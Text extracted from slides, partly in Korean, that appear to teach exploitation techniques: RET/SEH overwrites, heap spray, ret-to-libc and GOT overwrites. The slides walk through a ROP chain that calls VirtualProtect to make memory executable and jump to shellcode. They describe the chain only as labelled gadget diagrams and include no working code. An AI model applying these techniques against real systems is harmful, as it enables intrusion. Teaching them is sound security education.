ESP 를 VirtualProtect( ) 시작 위치로 변경하는 GadgetH-1


Introduction

Track3-1 Win32

Overwrite RET

Overwrite SEH

Egg-Hunting


Heap Spray

Track3-2 *NIX

Overwrite RET

Ret-to-LibC

Overwrite .dtors

Overwrite GOT

Track3-3 ARM

Overwrite RET

Ret-to-LibC


Step by Step -8





Junk + NOP

Shell Code





EIP Gadget A

Gadget C

Gadget D

Gadget E

Gadget F

Gadget G

Gadget H

Gadget B


Introduction

Track3-1 Win32

Overwrite RET

Overwrite SEH

Egg-Hunting


Heap Spray

Track3-2 *NIX

Overwrite RET

Ret-to-LibC

Overwrite .dtors

Overwrite GOT

Track3-3 ARM

Overwrite RET

Ret-to-LibC


Step by Step -9





Junk + NOP

Shell Code





EIP Gadget A

Gadget C

Gadget D

Gadget E

Gadget F

Gadget G

Gadget H

Gadget B

Execution

Step by Step -9


Introduction

Track3-1 Win32

Overwrite RET

Overwrite SEH

Egg-Hunting


Heap Spray

Track3-2 *NIX

Overwrite RET

Ret-to-LibC

Overwrite .dtors

Overwrite GOT

Track3-3 ARM

Overwrite RET

Ret-to-LibC


[ROP-8(final)코드 참조]


Introduction

Track3-1 Win32

Overwrite RET

Overwrite SEH

Egg-Hunting


Heap Spray

Track3-2 *NIX

Overwrite RET

Ret-to-LibC

Overwrite .dtors

Overwrite GOT

Track3-3 ARM

Overwrite RET

Ret-to-LibC



Call VirtualProtectEX

Change the protection on a region of committed page and Return to start point of shell code , Execute it

Thank You :)

See you the week after next week